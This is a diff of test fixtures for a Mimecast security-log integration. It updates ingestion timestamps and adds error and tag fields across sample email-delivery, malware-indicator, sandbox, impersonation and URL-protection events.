incorrect\",\"RejCode\":\"550\",\"AttCnt\":0,\"Dir\":\"Inbound\",\"ReceiptAck\":null,\"MsgId\":null,\"Subject\":null,\"Latency\":505,\"Sender\":\"\u003c\u003e\",\"datetime\":\"2021-10-19T07:06:40+0100\",\"Rcpt\":\"johndoe@example.com\",\"AttSize\":0,\"Attempt\":1,\"RejInfo\":\"5.4.1 Recipient address rejected: Access denied. AS(201806281) [LO2GBR01FT037.eop-gbr01.prod.protection.outlook.com]\",\"TlsVer\":\"TLSv1.2\",\"Cphr\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"Snt\":125,\"aCode\":\"29be076e-44cd-354d-a7c2-083d4a312371\",\"UseTls\":\"Yes\",\"Route\":\"Office365\",\"Content-Disposition\":\"attachment; filename=\\\"delivery_20211018093329655.json\\\"\"}", "created": "2021-10-19T07:06:40+0100", "outcome": "failure" }, + "error": { + "type": "Recipient email address is possibly incorrect", + "code": "550" + }, "email": { "from": { "address": "\u003c\u003e" @@ -81,6 +78,9 @@ "local_id": "29be076e-44cd-354d-a7c2-083d4a312371", "direction": "Inbound" }, + "tags": [ + "preserve_original_event" + ], "mimecast": { "acc": "ABC123", "Snt": 125, 
@@ -97,7 +97,7 @@ }, "event": { "action": "Acc", - "ingested": "2021-12-09T15:16:05.665553900Z", + "ingested": "2021-12-14T14:48:21.314974698Z", "original": "{\"acc\":\"ABC123\",\"Sender\":\"postmaster@twotoeight.com\",\"datetime\":\"2021-10-19T07:04:55+0100\",\"AttSize\":0,\"Content-Disposition\":\"attachment; filename=\\\"process_20211018093329655.json\\\"\",\"Act\":\"Acc\",\"aCode\":\"61dfe7da-4c6d-34e1-9667-69b04f0d564f\",\"AttCnt\":0,\"AttNames\":null,\"MsgSize\":49025,\"MsgId\":\"\u003c137188507-1634623494888@uk-mta-151.uk.mimecast.lan\u003e\",\"Subject\":\"You have new held messages\"}", "created": "2021-10-19T07:04:55+0100", "outcome": "unknown" 
@@ -137,7 +137,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T15:16:05.665560600Z", + "ingested": "2021-12-14T14:48:21.314975133Z", "original": "{\"acc\":\"ABC123\",\"Delivered\":true,\"IP\":\"67.43.156.15\",\"AttCnt\":0,\"Dir\":\"Internal\",\"ReceiptAck\":\"250 SmtpInternalThread-19194240-1634623495703@uk-mta-151.uk.mimecast.lan Received OK [61dfe7da-4c6d-34e1-9667-69b04f0d564f.uk151]\",\"MsgId\":\"\u003c137188507-1634623494888@uk-mta-151.uk.mimecast.lan\u003e\",\"Subject\":null,\"Latency\":1090,\"Sender\":\"johndoe@example.com\",\"datetime\":\"2021-10-19T07:04:55+0100\",\"Rcpt\":\"johndoejr@example.com\",\"AttSize\":0,\"Attempt\":1,\"Snt\":51666,\"aCode\":\"61dfe7da-4c6d-34e1-9667-69b04f0d564f\",\"UseTls\":\"No\", \"Content-Disposition\":\"attachment; filename=\\\"delivery_20211018093329655.json\\\"\"},{\"acc\":\"ABC123\",\"Delivered\":false,\"IP\":\"67.43.156.15\",\"RejType\":\"Recipient email address is possibly incorrect\",\"RejCode\":\"550\",\"AttCnt\":0,\"Dir\":\"Internal\",\"ReceiptAck\":null,\"MsgId\":\"\u003c137188507-1634623494888@uk-mta-151.uk.mimecast.lan\u003e\",\"Subject\":\"You have new held messages\",\"Latency\":1534,\"Sender\":\"johndoe@example.com\",\"datetime\":\"2021-10-19T07:04:56+0100\",\"Rcpt\":\"johndoejr@example.com\",\"AttSize\":0,\"Attempt\":1,\"RejInfo\":\"5.4.1 Recipient address rejected: Access denied. AS(201806281) [CWLGBR01FT010.eop-gbr01.prod.protection.outlook.com]\",\"TlsVer\":\"TLSv1.2\",\"Cphr\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"Snt\":147,\"aCode\":\"61dfe7da-4c6d-34e1-9667-69b04f0d564f\",\"UseTls\":\"Yes\",\"Route\":\"Office365\",\"Content-Disposition\":\"attachment; filename=\\\"delivery_20211018093329655.json\\\"\"}", "created": "2021-10-19T07:04:55+0100", "outcome": "success" 
@@ -177,7 +177,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T15:16:05.665567200Z", + "ingested": "2021-12-14T14:48:21.314975525Z", "original": "{\"acc\":\"C46A75\",\"Sender\":\"johndoe@example.com\",\"datetime\":\"2021-11-08T12:09:18+0000\",\"Rcpt\":\"o365_service_account@example.com\",\"RcptActType\":\"Jnl\",\"aCode\":\"CYSuuaBUMjOpk3k1Xhvy_Q\",\"Dir\":\"Internal\",\"RcptHdrType\":\"Unknown\", \"Content-Disposition\":\"attachment; filename=\\\"jrnl_20211018093329655.json\\\"\"}", "created": "2021-11-08T12:09:18+0000", "outcome": "unknown" @@ -212,7 +212,7 @@ }, "event": { "action": "Acc", - "ingested": "2021-12-09T15:16:05.665573200Z", + "ingested": "2021-12-14T14:48:21.314975905Z", "original": "{\"acc\":\"C46A75\",\"Sender\":\"johndoe@example.com\",\"datetime\":\"2021-11-08T12:10:19+0000\",\"Rcpt\":\"johndoejr@example.com\",\"Act\":\"Acc\",\"IP\":\"81.2.69.193\",\"aCode\":\"3dbe9918-f91f-3043-b61f-d3164badfe50\",\"Dir\":\"Internal\",\"Subject\":\"You have new held messages\",\"MsgId\":\"\u003c140943948-1636373419265@uk-mta-286.uk.mimecast.lan\u003e\",\"headerFrom\":\"johndoe@example.com\", \"Content-Disposition\":\"attachment; filename=\\\"receipt_20211018093329655.json\\\"\"}", "created": "2021-11-08T12:10:19+0000", "outcome": "unknown" 
@@ -250,7 +250,7 @@ "event": { "reason": "malicious", "action": "Block", - "ingested": "2021-12-09T15:16:05.665578600Z", + "ingested": "2021-12-14T14:48:21.314976283Z", "original": "{\"acc\":\"C46A75\",\"reason\":\"malicious\",\"subject\":\"DocuSign- Contract #45576744333\",\"msgid\":null,\"url\":\"http:\\/\\/docusign.swrodgods.x10.mx\\/Docun\\/Docu\\/index2.php\",\"datetime\":\"2021-11-29T15:13:58+0000\",\"route\":\"inbound\",\"sourceIp\":\"81.2.69.193\",\"sender\":\"docusign-services@zenz.us\",\"recipient\":\"aorchard@twotoeight.com\",\"action\":\"Block\",\"urlCategory\":\"Phishing \u0026 Fraud\",\"credentialTheft\":null,\"senderDomain\":\"zenz.us\", \"Content-Disposition\":\"attachment; filename=\\\"ttp_url_20211129153015541.json\\\"\"}", "created": "2021-11-29T15:13:58+0000", "outcome": "unknown" diff --git a/packages/mimecast/data_stream/threat_intel_malware_customer/_dev/test/pipeline/test-threat-intel-malware-customer.log-expected.json b/packages/mimecast/data_stream/threat_intel_malware_customer/_dev/test/pipeline/test-threat-intel-malware-customer.log-expected.json index a878745fd1f..a19f6c5a3b2 100644 --- a/packages/mimecast/data_stream/threat_intel_malware_customer/_dev/test/pipeline/test-threat-intel-malware-customer.log-expected.json +++ b/packages/mimecast/data_stream/threat_intel_malware_customer/_dev/test/pipeline/test-threat-intel-malware-customer.log-expected.json 
@@ -24,7 +24,7 @@ } }, "event": { - "ingested": "2021-12-09T15:16:06.051075700Z", + "ingested": "2021-12-14T14:48:21.740195622Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_customer_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--18c62174-0d31-4653-afe6-d104c57b6b2c\", \"created\": \"2021-10-29T15:07:26.653Z\", \"modified\": \"2021-10-29T15:07:26.653Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = 'c20d551424f2df6312f7fa700ed97cd199c3d5c8a0f4dfd683627f18913096de']\", \"valid_from\": \"2021-10-29T15:07:26.653Z\" }", "category": "threat", "type": "indicator", @@ -69,7 +69,7 @@ } }, "event": { - "ingested": "2021-12-09T15:16:06.051095300Z", + "ingested": "2021-12-14T14:48:21.740196813Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_customer_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--d70d0fc0-7fbe-4acc-9830-230a97ecdab3\", \"created\": \"2021-10-29T15:07:22.595Z\", \"modified\": \"2021-10-29T15:07:22.595Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = '6a6cd489550ddc08871e14dec73f782bf2405378e9f4adeaa61f1574bea4dbbb']\", \"valid_from\": \"2021-10-29T15:07:22.595Z\" }", "category": "threat", "type": "indicator", @@ -114,7 +114,7 @@ } }, "event": { - "ingested": "2021-12-09T15:16:06.051110900Z", + "ingested": "2021-12-14T14:48:21.740197902Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_customer_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--571f0b0a-7206-4a1f-9c5d-9c04e46e0976\", \"created\": \"2021-10-29T15:07:17.538Z\", \"modified\": \"2021-10-29T15:07:17.538Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = '8042d56337b7e7be79688ca861b3c4ba928f95b0824f598ca79e63882dea0668']\", \"valid_from\": \"2021-10-29T15:07:17.538Z\" }", "category": "threat", "type": "indicator", 
@@ -159,7 +159,7 @@ } }, "event": { - "ingested": "2021-12-09T15:16:06.051126200Z", + "ingested": "2021-12-14T14:48:21.740198966Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_customer_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--90b29bf9-ea1a-423b-8542-4c4590f4038c\", \"created\": \"2021-10-29T15:07:14.044Z\", \"modified\": \"2021-10-29T15:07:14.044Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = 'df086e1fe742f0992ecd2aec8a3a4b5be6023cca5ef8caf1da3d5b67e9359047']\", \"valid_from\": \"2021-10-29T15:07:14.044Z\" }", "category": "threat", "type": "indicator", @@ -204,7 +204,7 @@ } }, "event": { - "ingested": "2021-12-09T15:16:06.051142400Z", + "ingested": "2021-12-14T14:48:21.740200222Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_customer_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--a84c0ac6-f99e-4d1e-b552-74e9023d1505\", \"created\": \"2021-10-29T15:07:07.295Z\", \"modified\": \"2021-10-29T15:07:07.295Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = '5dbdcba2a373949359459e0e94954896bc06565d745dd36ee2b013dee1dcc283']\", \"valid_from\": \"2021-10-29T15:07:07.295Z\" }", "category": "threat", "type": "indicator", @@ -249,7 +249,7 @@ } }, "event": { - "ingested": "2021-12-09T15:16:06.051158200Z", + "ingested": "2021-12-14T14:48:21.740201418Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_customer_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--1fe76455-3ec3-4319-a34c-e4e8e8236ec0\", \"created\": \"2021-10-29T15:07:00.555Z\", \"modified\": \"2021-10-29T15:07:00.555Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = 'bcb910f6ab3144c97ca15845741c94479a8925f545ddf59e74253f50d862d10c']\", \"valid_from\": \"2021-10-29T15:07:00.555Z\" }", "category": "threat", "type": "indicator", 
@@ -294,7 +294,7 @@ } }, "event": { - "ingested": "2021-12-09T15:16:06.051176100Z", + "ingested": "2021-12-14T14:48:21.740202489Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_customer_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--3816deef-ba8f-40c4-ba11-a862b4322b11\", \"created\": \"2021-10-29T15:07:00.259Z\", \"modified\": \"2021-10-29T15:07:00.259Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = 'e87c5de5f07b36806521334cd25e756b66aa8376d2d52faf269b1878c62cf3dd']\", \"valid_from\": \"2021-10-29T15:07:00.259Z\" }", "category": "threat", "type": "indicator", diff --git a/packages/mimecast/data_stream/threat_intel_malware_grid/_dev/test/pipeline/test-threat-intel-malware-grid.log-expected.json b/packages/mimecast/data_stream/threat_intel_malware_grid/_dev/test/pipeline/test-threat-intel-malware-grid.log-expected.json index 7123ee94e96..eec0f0f1123 100644 --- a/packages/mimecast/data_stream/threat_intel_malware_grid/_dev/test/pipeline/test-threat-intel-malware-grid.log-expected.json +++ b/packages/mimecast/data_stream/threat_intel_malware_grid/_dev/test/pipeline/test-threat-intel-malware-grid.log-expected.json @@ -24,7 +24,7 @@ } }, "event": { - "ingested": "2021-12-09T15:16:06.632077Z", + "ingested": "2021-12-14T14:48:22.310868961Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_grid_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--18c62174-0d31-4653-afe6-d104c57b6b2c\", \"created\": \"2021-10-29T15:07:26.653Z\", \"modified\": \"2021-10-29T15:07:26.653Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = 'c20d551424f2df6312f7fa700ed97cd199c3d5c8a0f4dfd683627f18913096de']\", \"valid_from\": \"2021-10-29T15:07:26.653Z\" }", "category": "threat", "type": "indicator", 
@@ -69,7 +69,7 @@ } }, "event": { - "ingested": "2021-12-09T15:16:06.632093200Z", + "ingested": "2021-12-14T14:48:22.310870239Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_grid_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--d70d0fc0-7fbe-4acc-9830-230a97ecdab3\", \"created\": \"2021-10-29T15:07:22.595Z\", \"modified\": \"2021-10-29T15:07:22.595Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = '6a6cd489550ddc08871e14dec73f782bf2405378e9f4adeaa61f1574bea4dbbb']\", \"valid_from\": \"2021-10-29T15:07:22.595Z\" }", "category": "threat", "type": "indicator", @@ -114,7 +114,7 @@ } }, "event": { - "ingested": "2021-12-09T15:16:06.632108200Z", + "ingested": "2021-12-14T14:48:22.310871493Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_grid_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--571f0b0a-7206-4a1f-9c5d-9c04e46e0976\", \"created\": \"2021-10-29T15:07:17.538Z\", \"modified\": \"2021-10-29T15:07:17.538Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = '8042d56337b7e7be79688ca861b3c4ba928f95b0824f598ca79e63882dea0668']\", \"valid_from\": \"2021-10-29T15:07:17.538Z\" }", "category": "threat", "type": "indicator", @@ -159,7 +159,7 @@ } }, "event": { - "ingested": "2021-12-09T15:16:06.632122500Z", + "ingested": "2021-12-14T14:48:22.310872732Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_grid_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--90b29bf9-ea1a-423b-8542-4c4590f4038c\", \"created\": \"2021-10-29T15:07:14.044Z\", \"modified\": \"2021-10-29T15:07:14.044Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = 'df086e1fe742f0992ecd2aec8a3a4b5be6023cca5ef8caf1da3d5b67e9359047']\", \"valid_from\": \"2021-10-29T15:07:14.044Z\" }", "category": "threat", "type": "indicator", 
@@ -204,7 +204,7 @@ } }, "event": { - "ingested": "2021-12-09T15:16:06.632141Z", + "ingested": "2021-12-14T14:48:22.310874075Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_grid_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--a84c0ac6-f99e-4d1e-b552-74e9023d1505\", \"created\": \"2021-10-29T15:07:07.295Z\", \"modified\": \"2021-10-29T15:07:07.295Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = '5dbdcba2a373949359459e0e94954896bc06565d745dd36ee2b013dee1dcc283']\", \"valid_from\": \"2021-10-29T15:07:07.295Z\" }", "category": "threat", "type": "indicator", @@ -249,7 +249,7 @@ } }, "event": { - "ingested": "2021-12-09T15:16:06.632158800Z", + "ingested": "2021-12-14T14:48:22.310875429Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_grid_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--1fe76455-3ec3-4319-a34c-e4e8e8236ec0\", \"created\": \"2021-10-29T15:07:00.555Z\", \"modified\": \"2021-10-29T15:07:00.555Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = 'bcb910f6ab3144c97ca15845741c94479a8925f545ddf59e74253f50d862d10c']\", \"valid_from\": \"2021-10-29T15:07:00.555Z\" }", "category": "threat", "type": "indicator", @@ -294,7 +294,7 @@ } }, "event": { - "ingested": "2021-12-09T15:16:06.632176600Z", + "ingested": "2021-12-14T14:48:22.310876598Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_grid_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--3816deef-ba8f-40c4-ba11-a862b4322b11\", \"created\": \"2021-10-29T15:07:00.259Z\", \"modified\": \"2021-10-29T15:07:00.259Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = 'e87c5de5f07b36806521334cd25e756b66aa8376d2d52faf269b1878c62cf3dd']\", \"valid_from\": \"2021-10-29T15:07:00.259Z\" }", "category": "threat", "type": "indicator", 
diff --git a/packages/mimecast/data_stream/ttp_ap_logs/_dev/test/pipeline/test-ttp-ap-logs.log-expected.json b/packages/mimecast/data_stream/ttp_ap_logs/_dev/test/pipeline/test-ttp-ap-logs.log-expected.json index 23150b6a377..e3ecd05da78 100644 --- a/packages/mimecast/data_stream/ttp_ap_logs/_dev/test/pipeline/test-ttp-ap-logs.log-expected.json +++ b/packages/mimecast/data_stream/ttp_ap_logs/_dev/test/pipeline/test-ttp-ap-logs.log-expected.json @@ -15,7 +15,7 @@ }, "event": { "action": "user_release_none", - "ingested": "2021-12-09T15:16:07.254286800Z", + "ingested": "2021-12-14T14:48:22.845496090Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"fileName\":\"numbers.pdf\",\"fileType\":\"application\\/pdf\",\"result\":\"safe\",\"actionTriggered\":\"user release, none\",\"date\":\"2021-10-14T18:54:32+0000\",\"details\":\"Safe \\r\\nTime taken: 0 hrs, 0 min, 4 sec\",\"route\":\"inbound\",\"messageId\":\"\u003c20200806044148.F35F813B435@mail.brianjthronton.com\u003e\",\"subject\":\"Important Updated Numbers from the Center for Disease Control\",\"fileHash\":\"eaeef09b60a59b913e9bfc0a4373e25d6182beff388957473fba517cc09345e3\",\"definition\":\"Inbound - Safe file with On-Demand Sandbox\"}", "created": "2021-10-14T18:54:32+0000" }, 
@@ -61,7 +61,7 @@ }, "event": { "action": "user_release_none", - "ingested": "2021-12-09T15:16:07.254295600Z", + "ingested": "2021-12-14T14:48:22.845498572Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"fileName\":\"Titus-Test Doc - Classification - InternalUseOnly.docx\",\"fileType\":\"application\\/vnd.openxmlformats-officedocument.wordprocessingml.document\",\"result\":\"safe\",\"actionTriggered\":\"user release, none\",\"date\":\"2021-10-14T11:24:23+0000\",\"details\":\"Safe \\r\\nTime taken: 0 hrs, 0 min, 5 sec\",\"route\":\"inbound\",\"messageId\":\"\u003cDB8P194MB0824EE4C8D360CCE3DEB0243A1B89@DB8P194MB0824.EURP194.PROD.OUTLOOK.COM\u003e\",\"subject\":\"FW: Titus classification work\",\"fileHash\":\"2fb26be55ac710e4d9f80677ba24ae212dbb36bd934a0569fe521839e9f5d16e\",\"definition\":\"Inbound - Safe file with On-Demand Sandbox\"}", "created": "2021-10-14T11:24:23+0000" }, @@ -107,7 +107,7 @@ }, "event": { "action": "user_release_none", - "ingested": "2021-12-09T15:16:07.254301700Z", + "ingested": "2021-12-14T14:48:22.845499051Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"fileName\":\"Titus classification v0.3.pptx\",\"fileType\":\"application\\/vnd.openxmlformats-officedocument.presentationml\",\"result\":\"safe\",\"actionTriggered\":\"user release, none\",\"date\":\"2021-10-14T11:24:23+0000\",\"details\":\"Safe \\r\\nTime taken: 0 hrs, 0 min, 5 sec\",\"route\":\"inbound\",\"messageId\":\"\u003cDB8P194MB0824EE4C8D360CCE3DEB0243A1B89@DB8P194MB0824.EURP194.PROD.OUTLOOK.COM\u003e\",\"subject\":\"FW: Titus classification work\",\"fileHash\":\"111b86e1244ce6389efb60cddc001d594d334c540e85f9976be467a4ce472973\",\"definition\":\"Inbound - Safe file with On-Demand Sandbox\"}", "created": "2021-10-14T11:24:23+0000" }, 
diff --git a/packages/mimecast/data_stream/ttp_ip_logs/_dev/test/pipeline/test-ttp-ip-logs.log-expected.json b/packages/mimecast/data_stream/ttp_ip_logs/_dev/test/pipeline/test-ttp-ip-logs.log-expected.json index d6fab92838c..cd58b61e693 100644 --- a/packages/mimecast/data_stream/ttp_ip_logs/_dev/test/pipeline/test-ttp-ip-logs.log-expected.json +++ b/packages/mimecast/data_stream/ttp_ip_logs/_dev/test/pipeline/test-ttp-ip-logs.log-expected.json @@ -18,7 +18,7 @@ }, "event": { "action": "none", - "ingested": "2021-12-09T15:16:07.465640200Z", + "ingested": "2021-12-14T14:48:23.039517642Z", "original": "{\"id\":\"MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjU1NjIw1FEqSy0qzszPU7ICskvywAoNDAyVagFirRIG\",\"senderAddress\":\"smtp@example.com\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Requested File\",\"definition\":\"IP - 1 hit (Tag email)\",\"hits\":1,\"identifiers\":[\"internal_user_name\"],\"action\":\"none\",\"taggedExternal\":false,\"taggedMalicious\":true,\"senderIpAddress\":\"67.43.156.15\",\"eventTime\":\"2021-10-15T17:10:46+0000\",\"impersonationResults\":[{\"impersonationDomainSource\":\"internal_user_name\",\"similarDomain\":\"John Doe Jr \u003cjohndoejr@example.com\u003e\",\"stringSimilarToDomain\":\"John Doe Jr\",\"checkerResult\":\"hit\"}],\"messageId\":\"\u003cEE7E97EA-1926-4A90-9399-D049A98893F4@emailsec.ninja\u003e\"}", "id": "MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjU1NjIw1FEqSy0qzszPU7ICskvywAoNDAyVagFirRIG", "created": "2021-10-15T17:10:46+0000" 
@@ -71,7 +71,7 @@ }, "event": { "action": "none", - "ingested": "2021-12-09T15:16:07.465645200Z", + "ingested": "2021-12-14T14:48:23.039520180Z", "original": "{\"id\":\"MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjUzszAx0VEqSy0qzszPU7Iy1FEqyQMrNDAwVaoFAGShEhs\",\"senderAddress\":\"johndoe@gmail.com\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Fwd: Here ya go\",\"definition\":\"IP - 1 hit (Tag email)\",\"hits\":1,\"identifiers\":[\"internal_user_name\"],\"action\":\"none\",\"taggedExternal\":false,\"taggedMalicious\":true,\"senderIpAddress\":\"67.43.156.15\",\"eventTime\":\"2021-10-15T06:16:34+0000\",\"impersonationResults\":[{\"impersonationDomainSource\":\"internal_user_name\",\"similarDomain\":\"John Doe \u003cjohndoe@example.com\u003e\",\"stringSimilarToDomain\":\"John Doe\",\"checkerResult\":\"hit\"}],\"messageId\":\"\u003cCAOsCE-eP_fM6j=OL7Mwufic_s8t8VgNaCWdWM+sHYvWAFxiDig@mail.gmail.com\u003e\"}", "id": "MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjUzszAx0VEqSy0qzszPU7Iy1FEqyQMrNDAwVaoFAGShEhs", "created": "2021-10-15T06:16:34+0000" 
@@ -124,7 +124,7 @@ }, "event": { "action": "hold", - "ingested": "2021-12-09T15:16:07.465651500Z", + "ingested": "2021-12-14T14:48:23.039520641Z", "original": "{\"id\":\"MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjUzMDMz01EqSy0qzszPU7Iy1FEqyQMrNDAwVaoFAGQhEhc\",\"senderAddress\":\"johndoe@mimecast.com\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"RE: MSP Sales of Managed E2E\",\"definition\":\"IP - 2 hits (Hold for Review \\/ User Hold)\",\"hits\":2,\"identifiers\":[\"targeted_threat_dictionary\",\"internal_user_name\"],\"action\":\"hold\",\"taggedExternal\":false,\"taggedMalicious\":true,\"senderIpAddress\":\"67.43.156.15\",\"eventTime\":\"2021-10-13T16:12:07+0000\",\"impersonationResults\":[{\"impersonationDomainSource\":\"internal_user_name\",\"similarDomain\":\"Emily Doe \u003cemilydoe@example.com\u003e\",\"stringSimilarToDomain\":\"Emily Doe\",\"checkerResult\":\"hit\"},{\"impersonationDomainSource\":\"targeted_threat_dictionary\",\"stringSimilarToDomain\":\"who\"}],\"messageId\":\"\u003cPR3P194MB06183A3BE81F0831A8402B47D3B79@PR3P194MB0618.EURP194.PROD.OUTLOOK.COM\u003e\"}", "id": "MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjUzMDMz01EqSy0qzszPU7Iy1FEqyQMrNDAwVaoFAGQhEhc", "created": "2021-10-13T16:12:07+0000" diff --git a/packages/mimecast/data_stream/ttp_url_logs/_dev/test/pipeline/test-ttp-url-logs.log-expected.json b/packages/mimecast/data_stream/ttp_url_logs/_dev/test/pipeline/test-ttp-url-logs.log-expected.json index ed7f5ccbef8..7531f183166 100644 --- a/packages/mimecast/data_stream/ttp_url_logs/_dev/test/pipeline/test-ttp-url-logs.log-expected.json +++ b/packages/mimecast/data_stream/ttp_url_logs/_dev/test/pipeline/test-ttp-url-logs.log-expected.json 
@@ -28,7 +28,7 @@ }, "event": { "action": "Continue", - "ingested": "2021-12-09T15:16:07.699281Z", + "ingested": "2021-12-14T14:48:23.257050639Z", "original": "{\"userEmailAddress\": \"johndoe@example.com\", \"fromUserEmailAddress\": \"bestbuyinfo@emailinfo.bestbuy.com\", \"url\": \"https://click.emailinfo2.bestbuy.com/?qs=5c47c91aeb44fac857370c26ddf09c3f484431e1ccfa636fc64e26e40dd87efdb43d4deeeab8c2e727ebfa079e8cf1404c095c511152e4b09e7d00bf8377f32d\", \"ttpDefinition\": \"Inbound URL 'Aggressive'\", \"subject\": \"Today only: Save $100 on Tineco Pure One S12 smart cordless stick vacuum, plus more.\", \"action\": \"allow\", \"adminOverride\": \"N/A\", \"userOverride\": \"None\", \"scanResult\": \"clean\", \"category\": \"Business\", \"sendingIp\": \"67.43.156.15\", \"userAwarenessAction\": \"Continue\", \"date\": \"2021-10-16T14:45:34+0000\", \"actions\": \"Allow\", \"route\": \"inbound\", \"creationMethod\": \"User Click\", \"emailPartsDescription\": [ \"Body\" ], \"messageId\": \"\u003c31b43097-94f9-4f64-8e37-8ad23650c692@ind1s01mta1292.xt.local\u003e\" }", "created": "2021-10-16T14:45:34+0000" }, 
@@ -86,7 +86,7 @@ }, "event": { "action": "Continue", - "ingested": "2021-12-09T15:16:07.699289800Z", + "ingested": "2021-12-14T14:48:23.257055410Z", "original": "{\"userEmailAddress\":\"johndoe@example.com\",\"fromUserEmailAddress\":\"noreply@r.livingsocial.com\",\"url\":\"https:\\/\\/www.livingsocial.com\\/browse\\/?locale=en_US\u0026topCategory=all-deals\u0026p=14\u0026utm_source=newsletter_im\u0026utm_medium=email\u0026t_division=boston\u0026date=20211016\u0026uu=1bea09ca-8a29-11e9-b7f7-0242ac120002\u0026CID=US\u0026tx=0\u0026s=body\u0026c=banner\u0026d=dynamic-banner-4\u0026utm_campaign=194d1bb8-dc74-4bed-b470-0154e934bfb3_0_20211016_treatment0\",\"ttpDefinition\":\"Inbound URL 'Aggressive'\",\"subject\":\"Jump Pass + Mega Sale\",\"action\":\"allow\",\"adminOverride\":\"N\\/A\",\"userOverride\":\"None\",\"scanResult\":\"clean\",\"category\":\"Business\",\"sendingIp\":\"67.43.156.15\",\"userAwarenessAction\":\"Continue\",\"date\":\"2021-10-16T14:07:38+0000\",\"actions\":\"Allow\",\"route\":\"inbound\",\"creationMethod\":\"User Click\",\"emailPartsDescription\":[\"Body\"],\"messageId\":\"\u003c803962655.28921622.1634393221485.JavaMail.rocketman@push-dispatcher65.sac1\u003e\"}", "created": "2021-10-16T14:07:38+0000" }, 
